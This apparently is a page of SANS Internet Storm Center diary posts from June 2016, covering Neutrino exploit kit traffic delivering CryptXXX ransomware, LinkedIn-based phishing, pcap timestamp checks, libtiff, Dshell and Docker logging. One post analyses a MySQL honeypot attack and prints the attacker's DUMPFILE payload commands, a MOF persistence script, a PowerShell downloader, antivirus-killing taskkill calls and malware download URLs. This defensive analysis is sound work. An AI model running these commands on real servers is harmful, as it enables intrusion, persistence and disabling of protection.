  • port 80 - ktljl.g3alead.top - Neutrino EK (pseudo-Darkleech campaign)
  • port 80 - nulesz.tk - EITest flash redirect
  • port 80 - vnogjnbaf.c0ecompare.top - Neutrino EK (EITest campaign)
  • port 80 - zijkhhcsrd.c0ecompare.top - Neutrino EK (EITest campaign)
  • port 443 - CryptXXX callback traffic (custom encoding)

In both cases, Neutrino EK delivered CryptXXX ransomware as a DLL file.  As usual with CryptXXX infections, we saw C:\Windows\System32\rundll32.exe copied to the same folder as the CryptXXX DLL file.  In this case, it was re-named explorer.exe.

Shown above:  The CryptXXX DLL file and rundll32.exe copied and renamed as explorer.exe.

The two CryptXXX DLL files from these infections are:

  • 2016-06-07-EITest-Neutrino-EK-payload-CryptXXX.dll (419 kB) - VirusTotal link
    SHA256: d322e664f5c95afbbc1bff3f879228b40b8edd8e908b95a49f2eb87b9038c70b
  • 2016-06-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll (440 kB) - VirusTotal link
    SHA256: 75a927e636c788b7e54893161a643c258fecbbf47d6e7308d3439091aa3ce534

CryptXXX will have different domains in the decryption instructions depending on the campaign it came from.  In the two images below, you'll find different domains used in instructions from the EITest CryptXXX sample and instructions from the pseudo-Darkleech CryptXXX sample.

Shown above:  Part of the decrypt instructions from the EITest CryptXXX sample.

Shown above:  Part of the decrypt instructions from the pseudo-Darkleech CryptXXX sample.

Although CryptXXX samples from a specific campaign are changed or updated as the day progresses, they will always be different from CryptXXX samples from another campaign during the same timeframe.

Checking the traffic on Security Onion using Suricata and the ETPro ruleset, I found the usual alerts for Neutrino EK traffic and CryptXXX callback after the initial infection.

Shown above:  Using tcpreplay on one of the pcaps in Security Onion.

Last month, Neutrino EK was documented using Flash exploits based on CVE-2016-4117 effective against Adobe Flash Player up to version [15].  Post-infection traffic for CryptXXX is similar to what we've seen before.  Overall, we found no real surprises from these infections.  The only interesting fact is the switch (for now) from Angler EK to Neutrino EK to deliver CryptXXX.

Shown above:  Neutrino EK landing page (from the EITest pcap).

Shown above:  Neutrino EK sends Flash exploit (from the EITest pcap).

Shown above:  Neutrino EK sends the CryptXXX malware payload (from the EITest pcap).

Shown above:  CryptXXX callback traffic from one of the infections.

As stated earlier, EmergingThreats has a rule for CryptXXX callback traffic.  Talos also has you covered for CryptXXX in the Snort subscriber ruleset.

Shown above:  An example CryptXXX alerts on this traffic from the Snort subscriber ruleset.

Final words

Traffic patterns for Neutrino EK have remained relatively consistent since it reappeared in November 2014 after a 6-month absence [16].  The only big change?  Neutrino EK now sticks to port 80.  Before October or November of 2015, Neutrino EK almost always used a non-standard port for its HTTP traffic.  Since then, it's consistently used TCP port 80 (like every other EK I currently see).

How can people protect themselves against Neutrino EK?  As always, properly administered Windows hosts that follow best security practices (up-to-date applications, latest OS patches, software restriction policies, etc.) should be protected against this EK threat.

Unfortunately, a large percentage of Windows hosts don't follow best practices, and criminal groups are quick to take advantage.

User awareness is an important part of any defense.  You can't protect yourself from threats you don't understand.  With that in mind, I'll mention again a post on EK fundamentals located here.  It hopefully clears up some misconceptions I've heard over the years about EK activity.

Pcaps and malware for this ISC diary can be found here.

Shown above:  Desktop for one of the Windows hosts when rebooted after a CryptXXX infection.

Brad Duncan
brad [at] malware-traffic-analysis.net


[1] http://malware-traffic-analysis.net/2016/06/06/index.html/
[2] https://isc.sans.edu/forums/diary/Actor+using+Angler+exploit+kit+switched+to+Neutrino/20059/
[3] https://isc.sans.edu/forums/diary/Actor+that+tried+Neutrino+exploit+kit+now+back+to+Angler/20075/
[4] https://isc.sans.edu/forums/diary/Whats+the+situation+this+week+for+Neutrino+and+Angler+EK/20101/
[5] https://isc.sans.edu/forums/diary/EITest+campaign+still+going+strong/21081/
[6] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-new-ransomware-actors-behind-reveton-dropping-angler
[7] https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/
[8] http://researchcenter.paloaltonetworks.com/2016/04/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/
[9] https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool
[10] http://www.bleepingcomputer.com/news/security/cryptxxx-updated-to-version-3-0-decryptors-no-longer-work/
[11] http://www.bleepingcomputer.com/news/security/cryptxxx-rebranding-as-ultracrypter/
[12] http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptxxx-gets-overhaul-now-known-as-ultracrypter
[13] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-samba-other-new-tricks-with-version3100
[14] http://www.broadanalysis.com/2016/06/05/angler-exploit-kit-via-eitest-gate-sends-cryptxxx-ransomware/
[15] http://malware.dontneedcoffee.com/2016/05/cve-2016-4117-flash-up-to-2100213-and.html
[16] https://isc.sans.edu/forums/diary/Exploit+Kit+Evolution+Neutrino/19283/


Published: 2016-06-07

LinkedIn Breach Data Used For Malicious E-Mails

Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mail address the recipient by full name and job title. Typically, the attachments claim to contain an invoice.

We have since received a couple of users who reported receiving e-mails that match the pattern. For example: 

(Thanks to our reader Arjan for the sample)

The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible.

This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago about how Facebook data is used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past. 

Johannes B. Ullrich, Ph.D.


Published: 2016-06-06

What Time Is It? Using NTP Traffic to Calibrate PCAP Timestamps

This is an issue that came up today when discussion how tcpdump and Wireshark display time stamps. If you do have a packet capture file (pcap), it is nice to know that the time stamps are accurate. One way to assert accuracy is to use NTP traffic that was captured in the pcap file. 

First, lets limit ourself to NTP packets coming from a server. The NTP protocol uses different protocol modes. We are going to restrict ourselves to packets coming from NTP servers, which implies protocol mode 4. There is a simple Wireshark/tshark filter we can use: 

 ntp.flags.mode == 4

Next, we need to extract the time stamp. In NTP, we will receive 4 different time stamps:

- Reference Timestamp: Time the clock was last set
- Origin Timestamp: Time the request was sent from the client to the server
- Receive Timestamp: Time the request was received by the server
- Transmit Timestamp: Time at the server when the request left for the client

Among these time stamps, the Transmit Timestamp seems most appropriate. We can extract this from tshark using the "-T fields" option:

tshark -r ntp.pcap -n -Y "ntp.flags.mode==4" \
       -T fields -e ntp.xmt -e frame.time

"frame.time" will give us the time stamp from the packet capture.

The output is already pretty close to what we are looking for:

Jun  6, 2016 18:27:26.073666000 EDT    Jun  6, 2016 18:27:26.119514000 EDT
Jun  6, 2016 18:27:27.083747000 EDT    Jun  6, 2016 18:27:27.144937000 EDT
Jun  6, 2016 18:27:28.072173000 EDT    Jun  6, 2016 18:27:28.113482000 EDT
Jun  6, 2016 18:27:29.094674000 EDT    Jun  6, 2016 18:27:29.153425000 EDT

you can tell, that the times look very close. But we can do a bit better. We can convert the times to unix time stamps, and subtract them from each other to get the difference in second. A little shell script will help here. This can be done as a one-liner, but for readability, I split it up into several lines. The script assumes that the output of the tshark command above was saved to "ntp.txt"

​for x in `cat /tmp/ntp.txt`; do 
  if [ $t -eq 0 ]; then 
    echo $a - $b DIFF $((`date +%s -d $a`-`date +%s -d $b`))

(there may be a neat short way to do this with awk... take that as a challenge ;-). Oh, and please DO NOT replace the spaces I used to indent the lines with TABS... just because. )

The final output:

Jun  6, 2016 18:26:26.748699000 EDT - Jun  6, 2016 18:26:26.505266000 EDT DIFF 0
Jun  6, 2016 18:26:46.125142000 EDT - Jun  6, 2016 18:26:45.890823000 EDT DIFF 1
Jun  6, 2016 18:26:46.325736000 EDT - Jun  6, 2016 18:26:46.091757000 EDT DIFF 0
Jun  6, 2016 18:26:46.525703000 EDT - Jun  6, 2016 18:26:46.291742000 EDT DIFF 0
Jun  6, 2016 18:26:48.125179000 EDT - Jun  6, 2016 18:26:47.892105000 EDT DIFF 1
Jun  6, 2016 18:26:48.325629000 EDT - Jun  6, 2016 18:26:48.092543000 EDT DIFF 0

The last number indicates the difference in seconds. It should be 0 or 1 if times are synchronized well.

BTW: The exact syntax may differ a bit depending on your version of tshark. The "date" command also differs for various *ix systems. In particular OS X requires a different syntax.


Johannes B. Ullrich, Ph.D.


Published: 2016-06-05

What's Going on With libtiff?

"libtiff", as the name implies, is a library used to parse TIFF formatted images. While you don't run into TIFF images on the web every day, the format is quite popular for higher-resolution/high quality applications like printing. TIFF allows the user to select between lossless or lossy compression depending on the preferences of the user.

While the library is very popular, a reader wrote in last week asking if the library is still maintained.

Currently, there are three security issues listed in NIST's vulnerability database. These issues affect the most recent version of libtiff (4.0.6), which was released in September last year.  Popular software, like for example Google Chrome, uses libtiff and could be used to exploit these vulnerabilities.

This issue isn't unique to libtiff. Important libraries (not just open source, the same problem can come up with commercial software as well...) stop being maintained without notice, and users of these libraries have no idea that new vulnerabilities are no longer patched. 

If you develop software, it is critical that you track code that you include (again: open source and commercial). There are a number of check you should perform before adding a library to your repository of "approved third party code":

- is the code still maintained? (e.g. are there any outstanding vulnerabilities known)
- how would you learn about a patch being released? (mailing list? )
- is the code's license compatible with your project? (some open source licenses restrict commercial use)

And most important: Have a repository of "approved third party code"! Don't just include libraries without considering alternatives first. Code reuse is great, and developers should take advantage of already written code, but you have to manage the use of third party code.

And finally: What is your exit strategy? I have no idea what to recommend in the libtiff case. Can you do without it? Can you afford to wait (I don't see any exploits ... yet ... publicly...) 


Johannes B. Ullrich, Ph.D.


Published: 2016-06-03

MySQL is YourSQL

It's The End of the World and We Know It

If you listen to the press - those purveyors of doom, those “nattering nabobs of negativism” - you arrive at a single, undeniable conclusion: The world is going to hell in a hand-basket.

They tell us that we’ve become intolerant, selfish, and completely unconcerned with the welfare of our fellow man.

I’m here today to deliver a counterpoint to all of that negativity. I’ve come here to tell you that people are, essentially, GOOD.

You see: I am a database bubblehead.

Over the past few weeks, since I’ve deployed an obviously flawed, horribly insecure, and utterly fictitious “MySQL server,” I have received a veritable flood of free “assistance” in administering that system - provided by strangers from across the Interwebz.  They have - out of the very goodness of their hearts - taken over DBA duties. I’ve only had to sit back and watch...


Very, very carefully...

A Free DBA - And Worth EVERY Penny

There are so many folks interested in the toil and drudgery of DBA duties on my honeypot’s MySQL server, it seems like they’re taking shifts. One will arrive, do a touch of DBA work and then leave… eventually being replaced by another.  The amount of database-related kindness in this world is, in some ways, almost overwhelming.

Let’s take a look at what a typical “shift” for one of my “remote DBAs” looks like:

Arriving at the Office

My newest co-worker - our DBA du jour (who I’ve chosen to call “NoCostRemoteDBADude”) - makes his first appearance at the “office” and immediately logs into the MySQL server as ‘mysql’ with a blank password.

Note to self: Wow. That’s not very secure. I should probably fix that...

We all know how it is when you’re the FNG… you try your best to buckle down and get right to work… you know: impress the boss. NoCostRemoteDBADude does just that:

show variables like "%plugin%";
show variables like 'basedir';
show variables like "%plugin%";
SELECT @@version_compile_os;
show variables like '%version_compile_machine%';
use mysql;

Here, NoCostRemoteDBADude is obviously just trying to get the “lay of the land,” so to speak, and I can’t really say I blame him. After that whole, incredibly disappointing blank password thing, he’s got to be wondering what kind of idiot has been running this box…

I admit it: It was me, and I am a database bubblehead.

Have Toolz, Will Travel...

You can’t expect quality DBA work if you’re not willing to fork over cash for proper tools.

Unfortunately, my tool budget matches my expectation of quality: zero. If, therefore, you’re planning to remote-DBA my honeypot, it’s strictly B.Y.O. as far as tools go. While some folks may balk at the idea of doing DBA work for free AND providing your own tools, oddly, I’ve found no shortage of volunteers.

NoCostRemoteDBADude doesn’t disappoint. He obviously has a preferred suite of tools that he wastes no time installing:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
0000000000000000000000000000000000000 into DUMPFILE 

Obviously, NoCostRemoteDBADude is a fellow who knows his way around a MySQL database. Here, he’s using a SQL “SELECT” statement to dump a whole bunch of binary data (expressed as a single, long hexadecimal number) into a file, creating a Windows executable.

Although I am, admittedly, a database bubblehead, I know a thing or two about Perl, so I threw together a few lines of code designed to take the text representation of NoCostDBADude’s command and spit out a binary file.  Here’s what I found:

The file “ukGMx.exe” is a 36,864 byte long 32-bit Windows PE executable that, if run, immediately downloads hxxp://www.game918.me:2545/host.exe to the file “C:\Windows\shes.exe” and then launches that new executable. It also attempts some sort of weird “self-deleting” thing that, while it works, seems like overkill. Also, in looking over the executable, the old Win32 programmer in me is more than a little disappointed to see them using MFC42.dll. MFC was evil and bloaty from the outset, and it deserved to DIAF long ago. Seeing it included in exploit code is somewhat sad.  I find myself longing for the good ol’ days of being blown away by the coding prowess of the attackers… er… um… “remote-DBAs.”

Remember that I said “if run” in the above description. Right now, NoCostRemoteDBADude has only managed to create the file… he hasn’t managed to run anything. Yet.

Go Ahead And Just “Run” Your Code - I’m Gonna “Prancercize” Mine

Let’s see what else he has up his sleeve:

SELECT 0x23707261676D61206E616D65737061636528225C5
B0A into DUMPFILE 'C:/windows/system32/wbem/mof/buiXDj.mof';

A little Perl magic, and we find that this is actually a rather interesting text file:

#pragma namespace("\\\\.\\root\\cimv2")
class MyClass649
        [key] string Name;
class ActiveScriptEventConsumer : __EventConsumer
        [key] string Name;
        [not_null] string ScriptingEngine;
        string ScriptFileName;
        [template] string ScriptText;
  uint32 KillTimeout;
instance of __Win32Provider as $P
    Name  = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
instance of __EventConsumerProviderRegistration
  Provider = $P;
  ConsumerClassNames = {"ActiveScriptEventConsumer"};
Instance of ActiveScriptEventConsumer as $cons
  Name = "ASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"ukGMx.exe\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass649\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";

Instance of ActiveScriptEventConsumer as $cons2
  Name = "qndASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\Mxmto.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"ukGMx.exe\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
instance of __EventFilter as $Filt
  Name = "instfilt";
  Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass649\"";
  QueryLanguage = "WQL";
instance of __EventFilter as $Filt2
  Name = "qndfilt";
  Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"ukGMx.exe\"";
  QueryLanguage = "WQL";

instance of __FilterToConsumerBinding as $bind
  Consumer = $cons;
  Filter = $Filt;
instance of __FilterToConsumerBinding as $bind2
  Consumer = $cons2;
  Filter = $Filt2;
instance of MyClass649 as $MyClass
  Name = "ClassConsumer";

For those unfamiliar with them, “.mof” files are a very interesting attack/persistence mechanism, and, under the right circumstances, dropping a file with the extension “.mof” into the “C:\windows\system32\wbem\mof” directory can make magical things happen. “Managed Object Format” (.mof) files can be used to change WMI settings or transfer WMI objects between computers.

Unfortunately, for an attacker, the text form of a “.mof” file is pretty much benign. In order for them to actually DO anything, they need to be compiled into binary form (which is normally done using the program mofcomp.exe). The cool thing about the “C:\windows\system32\wbem\mof” directory is that dropping a file into that directory on pre-Vista versions of Windows would result in them being automatically compiled… If they successfully compile, they’re installed in “C:\windows\system32\wbem\mof\good” (and, in the event the compile fails, “C:\windows\system32\wbem\mof\bad” with a logfile of all actions taken by the compiler stored at “C:\windows\system32\wbem\Logs\mofcomp.log”)  Files installed in this way run repeatedly - and in this case, the “.mof” file installs an event filter class (“MyClass649”) that triggers on:

  1. The instantiation of the class “MyClass649” (yes… it triggers upon its own creation)
  2. If a running version of “ukGMx.exe” ever exits

When the filter is triggered, it simply runs the program “ukGMx.exe” using Wscript.Shell. (FYI: Stuxnet used a very similar attack...)

Spray N’ Pray

Now all that is well and good if the MySQL server running on an older version of Windows (and if MySQL is running as a privileged user…), but what happens if that isn’t the case?  Well, NoCostRemoteDBADude has a lot more bases covered:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
0000000000000000000 into DUMPFILE 'C:/Program Files/lpk.dll';

Again, we use some Perl magic to recover the binary of this file for examination:

The file lpk.dll is a 7,680 byte long 32-bit Windows DLL file that has been UPX compressed (uncompressed, it is 12,288 bytes long).

Not only does my NoCostRemoteDBADude drop lpk.dll in “C:/Program Files” but he drops the exact same file as:

  • 'C:/windows/lpk.dll'
  • 'lpk.dll'
  • 'C:/windows/system32/lpk.dll'
  • 'C:/lpk.dll'
  • 'D:/lpk.dll'
  • '%temp%/lpk.dll'
  • '%systemroot%/lpk.dll'
  • '../../bin/lpk.dll'
  • '../../lpk.dll'
  • '../lpk.dll'

NoCostRemoteDBADude’s apparent fetish for littering my hard drive with DLLs actually has a reasonable explanation: he’s attempting to exploit a DLL hijacking vulnerability.

The idea behind DLL hijacking is actually pretty simple. Windows has a search path for DLLs that works much in the same way that the $PATH environment variable works for finding executables. The default search path for DLLs works like this:

  1. The directory from which the application is run
  2. The current directory
  3. The system directory
  4. The 16-bit system directory
  5. The Windows directory
  6. The $PATH directories

Windows will look in each of those locations, in that order, until it finds the DLL it’s looking for. If, as an attacker, you can get a rogue/malicious DLL installed “in front” of the “real” DLL in that DLL search path, your DLL will be loaded instead of the real one, and run with the credentials of the application that is loading it.

By not specifying the full path to a system DLL, a program becomes vulnerable to this type of attack.  I whipped together a tiny Win32 executable that used LoadLibrary() to… well… load the library (lpk.dll). It’s also a perfect example for demonstrating DLL hijacking, because I “stupidly” used the command LoadLibrary(“lpk.dll”) rather than specifying a full system path.  On a clean install of Windows, it wouldn’t be a problem, but when I put NoCostRemoteDBADude’s version of lpk.dll in the same directory as my program, it loaded the malicious version instead.  Other programs vulnerable to “lpk.dll” hijacking? Several executables found in version 5.1 of MySQL.

I also used my “vulnerable” executable to investigate the behavior of the malicious DLL. When loaded, it provides all of the original functionality of the real lpk.dll with an interesting addition: it drops a 3,584 byte long 32-bit WIndows PE executable as “%Temp%\hrl1.tmp” (On Windows NT/2000/XP, %Temp% defaults to C:\Documents and Settings\[UserName]\Local Settings\Temp) and launches it.

This new “gift” from NoCostRemoteDBADude is actually a UPX compressed executable that, when uncompressed, weighs in at 24,576 bytes. The executable behaves very much like our friend ukGMx.exe from earlier (complete with the goofy “self-delete” functionality) but in addition to downloading hxxp://www.game918.me:2545/host.exe to C:\Windows\scvhost.exe and running it, it also downloads hxxp://www.82022333.cn:8065/im.exe to C:\Windows\fillworm.exe - before launching both programs and self-deleting.

A “User-Defined” Attack Vector

NoCostRemoteDBADude’s next move as a DBA was firing off the following, now-familiar-looking, command:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
00000000000000000000000000000000000000000000000 into 

This results in the creation of 1QyCNY.dll, a 6,144 byte-long UPX compressed Windows DLL. Interestingly, this file isn’t seen as malicious by - essentially - any antimalware tool that doesn’t get all wigged-out because a file is UPX compressed (seriously, AegisLabs, that’s the best you’ve got? It’s UPX compressed, therefore it must be EEEEEVIL!) The reason that is isn’t seen as malicious by non-reactionary antimalware tools is because… well… it ISN’T malicious. To understand why, we need to understand a little about MySQL UDFs (or, “User Defined Functions”).

In order to provide a mechanism for “extensibility,” MySQL allows for the addition of new functionality by loading User Defined Functions in shared libraries (.so files under Linux, and .dll files in Windows). If, for example, you had a pressing need to add new functionality to your SQL-based application… say, to turn the sound volume to “11” and announce via speech synthesis, “Hey everybody! I’m lookin’ at porn...” all whilst making the server’s CD tray slide in and out - not that I’ve ever DONE anything like that, mind you... You would simply create your function, compile it into a DLL (confession.dll) as an exported function (int porn_confession( )) along with a few other, necessary support functions, and then you can add the new function to MySQL like so:

CREATE FUNCTION porn_confession RETURNS INTEGER SONAME 'confession.dll';

NoCostRemoteDBADude’s 1QyCNY.dll file isn’t seen as malicious because it is, essentially, a perfectly legitimate MySQL UDF library (or, if you’re AegisLabs, it’s an unholy, UPX-packed spawn of Satan).  It’s simply a tool - a blunt instrument - that can be used for either good -  or as we’ll soon see - for evil.

What This Hack Needs Is More PowerShell

NoCostRemoteDBADude follows this with the creation of another file:

SELECT 0x24736F757263653D22687474703A2F2F7777772E6
3742E6578652229 into DUMPFILE 'c:/windows/temp.ps1';

This file turns out to look like this:

$www=New-Object System.Net.WebClient
$www.DownloadFile($source, $destination)

Yep, it’s some PowerShell code designed to download our old pal hxxp://www.game918.me:2545/host.exe, and - this time - save it as C:\Windows\host.exe before executing it.

Hacking All the Things

But how does all of this come together? NoCostRemoteDBADude has a solution. In an effort to bring all of his work full circle, he snaps off the following commands:

select sys_eval('taskkill /f /im 360safe.exe&taskkill /f /im 360sd.exe&taskkill /f /im 360rp.exe&taskkill /f /im 360rps.exe&taskkill /f /im 360tray.exe&taskkill /f /im ZhuDongFangYu.exe&exit');
select sys_eval('taskkill /f /im SafeDogGuardCenter.exe&taskkill /f /im SafeDogSiteIIS.exe&taskkill /f /im SafeDogUpdateCenter.exe&taskkill /f /im SafeDogServerUI.exe&taskkill /f /im kxescore.exe&taskkill /f /im kxetray.exe&exit');
select sys_eval('taskkill /f /im QQPCTray.exe&taskkill /f /im QQPCRTP.exe&taskkill /f /im QQPCMgr.exe&taskkill /f /im kavsvc.exe&taskkill /f /im alg.exe&taskkill /f /im AVP.exe&exit');
select sys_eval('taskkill /f /im egui.exe&taskkill /f /im ekrn.exe&taskkill /f /im ccenter.exe&taskkill /f /im rfwsrv.exe&taskkill /f /im Ravmond.exe&taskkill /f /im rsnetsvr.exe&taskkill /f /im egui.exe&taskkill /f /im MsMpEng.exe&taskkill /f /im msseces.exe&exit');
select sys_exec('PowerShell.exe -ExecutionPolicy Unrestricted -NoProfile -windowstyle hidden -File c:\\windows\\temp.ps1');

Here we see NoCostRemoteDBADude create two new MySQL UDFs using 1QyCNY.dll: sys_exec( ) and sys_eval( ). He then uses these new functions to whack various antimalware tasks, and then launches PowerShell to run the script he just created.

“...And Then Everyone In The Universe Died.” - Game Of Thrones, Book XXI

So, the end-game for NoCostRemoteDBADude is to get host.exe downloaded from www.game918.me and running on our system (he also wanted to download something from www.82022333.cn, but that site is currently kaput...).  Let’s take a look at that file, shall we?

The file “host.exe” is, essentially, a 102,400 byte-long 32-bit Windows PE remote control trojan with the capability to both download and install or run pretty much anything that NoCostRemoteDBADude wants put on the box.  Obviously, this is how he intends to do his DBA work.

In addition to its run-of-the-mill “remote administration” capabilities, host.exe also has another nifty capability. Buried deep in the bowels of the program’s data is an interesting list of 180 IP addresses.  I cut the list out of the file and did a little “reconnaissance.” What I found was very interesting: Every one of the IPs is a DNS server - moreover, every one acts as a recursive resolver.  I can think of only one reason that NoCostRemoteDBADude would have uploaded an executable primed with an expansive list of recursive resolvers: DNS Amplification DDoS.

The classic example of an “amplification” attack harkens back to the ‘90s when you used to be able to send an ICMP echo request from a spoofed IP to the broadcast address of a netblock. Back in that more-naïve time, the router would see an inbound packet destined for the broadcast address and dutifully forward it to every IP address in the block, resulting in a wave of ICMP echo responses being sent back to the spoofed IP address. For reasons I’ve been unable to figure out, this was known as a SMURF attack, and demonstrates the two requirements of a good amplification attack:

  1. The traffic that initiates the response is sent over a connection-less protocol (in this case, ICMP) and is, therefore, easily spoofed.
  2. The response elicited is significantly larger than the traffic that initiates it.

SMURF attacks have - happily - been relegated to the same dustbin o’ history as other ‘90s “stuff” we’d like to forget (Vanilla Ice, slap bracelets, and - oh, dear Lord - parachute pants) but that doesn’t mean amplification attacks are gone.

DNS fits both of our amplification criteria very well: requests are sent over a connection-less protocol (UDP) and you can get a pretty good amplification if you make the right request.  All you need is a bunch of friendly DNS servers that will allow anyone and everyone to make requests...

Alrighty Then...

NoCostRemoteDBADude had a few more tricks up his sleeve.  He tried several different types and versions of UDFs, and attempted to create new MySQL accounts, but this overview covers his most interesting techniques. I found this to be a fascinating attack simply because of the broad range of “tricks of the trade” in use: DLL hijacking, .mof files, MySQL UDFs, PowerShell, AV disabling, and DNS amplification… it’s a pretty broad swath of attacker techniques. 

Also, this is a perfect example of why AV vendors and others who tout “malware removal” methods are not doing anyone a favor. Once any of these executable are running on my server, the whole concept of “cleanup” becomes untenable because I can’t have any idea about what other “toyz” ol’ NoCost may have installed.

Well, at least until my server starts yelling “Hey everybody, I’m watchin’ porn!”...

Tom Liston
Consultant - Cyber Network Defense
DarkMatter, LLC
Follow Me On Twitter: @tliston
If you enjoyed this post, you can see more like it on my personal blog: http://yourflyisopen.com


Published: 2016-06-01

Performing network forensics with Dshell. Part 2: Decoder development process

We saw in part 1 how useful dshell can be. Let's talk about the decoder development process. You can develop the following decoder types:

  • PacketDecoder: This type of decoder is able to look for specific packet information in a live capture or PCAP file and then show it to the user in a customized way. 
  • SessionDecoder: This type of decoder is able to get information from a complete protocol session, from the initial connection to the end of the session.

Dshell has the following classes that can be used to develop the decoders:

  • dfile: Dshell class to handle file functions, wheter files are on memory or disk.
  • dnsdecoder: Dshell intermediate class used to support DNS-based decoders
  • dshell: Base class used to initialize the decoder to work in the framework. You can choose to use IPDecoder, IP6Decoder, UDPDecoder, UDP6Decoder, TCPDecoder, TCP6Decoder,Data, Packet, Connection or Blob
  • httpdecoder: Dshell intermediate class used to support HTTP-based decoders
  • util: Dshell class providing useful functions like decode_base64 to decode base64 strings, printableText to print just ASCII-printable chars to the screen, printableUnicode to print unicode text without the control characters, hexPlusAscii to return hex dump in a two-column presentation for binary input, URLDataToParameterDict that parses URL format string, strtok to tokenize a string as used in C and xorStringDecode used to decode xor from string char.
  • smbdecoder: This decoder extend dshell.TCPDecoder to handle SMB Message Requests/Responses.

Let's see an example of a simple decoder, which uses dpkt library as well:

This looks like a packet decoder, using the base definition of IPDecoder contained in the Dshell class. 

This function is part of all Packet Decoders. In this case, the dpkt library is used to dissect the IP packet to get just the TCP Header into the tcp variable. After that:

  • If SYN flag is set, the source port, destination port, source IP, destination IP and sequence number are printed
  • If not, if RST/ACK flags are set, the source port, destination port, source IP, destination IP and sequence number are printed

Dshell is instantiated. The whole code looks like this:

You can find this and other examples inside the decoders directory of Dshell.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail: msantand at isc dot sans dot org


Published: 2016-06-01

Docker Containers Logging

In a previous diary, Jim talked about forensic operations against Docker containers. To be able to perform investigations after an incident, we must have some "fresh meat” to search for artefacts. As Jim explained, memory is always a nice place to search (volatility is your best friend) but memory is... volatile! Docker is also very volatile by design. You don't know exactly where the containers are deployed and a system access to collect a memory image is not always easy. To increase our chances to find artefacts, it’s always better to collect data before the incident occurs and there is no magic: logs remain the best way to collect data.
Docker comes with multiple ways to logs containers’ events. More and more focus has been put on logging and today, many ways are available: 
  • JSON-file (JSON messages written to a flat file)
  • Syslog
  • Journald
  • GELF (Graylog Extended Log Format - used with Logstash)
  • Fluent
  • AWSlog (Amazon Web Services)
  • Splunk
  • ETWlogs (on Windows)
  • GCPlogs (Google Cloud Logging)

The default driver is ‘json-file’. Files are written on the Docker host (where the daemon is running) and are located in the following directory:
To review the logs, the command “docker logs ” can be used:
# docker logs dshield
Validating provided credentials...
API key verification succeeded!
Starting cowrie...
Removing stale pidfile /srv/cowrie/cowrie.pid 
Easy but not very convenient and data remains stored on the box. By design, some containers may have a very limited lifetime and once deleted, logs are gone too. It’s easy to replace the default driver with your preferred one. At daemon level, specify the driver to use and its options.
# docker daemon --log-driver= --log-opt 
Each driver comes with its own set of options that can be fine-tuned with '--log-opt =’. Example for the Syslog driver, we can configure the remote Syslog server and facility. More information about the different ways to configure logging is available on the Docker website. On Ubuntu, the best way to change the default configuration is to change the 'DOCKER_OPTS' environment variable in /etc/default/docker/. Here is mine:
DOCKER_OPTS='--log-driver=splunk \
--log-opt splunk-token=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx \
--log-opt splunk-url=https://splunk.fqdn.tld:8088 \
--log-opt splunk-insecureskipverify=true \
--log-opt tag="{{.ImageName}}/{{.Name}}/{{.ID}}" \
--log-opt labels=type,location'
Personally, I like the Splunk HTTP Event Collector. It is based on the web protocol and easy to deploy. Once you configured your Splunk instance to receive events from Docker, you will have a full visibility. Notice that you can use another driver for a specific container (ex: if you run a container for a customer or partner who want to use a Syslog destination).
Here is an example of a simple bash output in a Ubuntu container:
We find many interesting information:
(1) the user on the container ID
(2) the working directory
(3) the typed command in bash
(4) the image, container name and ID
Two important notes about containers logging: The first one is about timestamps: By default a container is started with a clock set to UTC. Keep this in mind while performing investigations. To fix the correct time zone, add the following lines in your Dockerfile:
# Set the timezone
RUN echo "Europe/Brussels" > /etc/timezone
RUN dpkg-reconfigure -f noninteractive tzdata
The second point is about logging network traffic. When the Docker daemon is started, a network dedicated to containers is deployed. An extra interface 'docker0' is created and a subnet is dedicated to containers. An IP address is dynamically assigned to the container when launched. From a forensic perspective, it is very interesting to log the egress traffic. To have a better visibility about the traffic from/to container, enable extra logging via the following command:
# iptables -L FORWARD 1 -j LOG

This will generate extra Syslog events (can be a huge amount!). The first one is an ongoing connection from a container, the second is an incoming connection:

Jun  1 20:15:36 inception kernel: [8415191.429757] IN=docker0 OUT=eth0 PHYSIN=veth2ad35f6 \
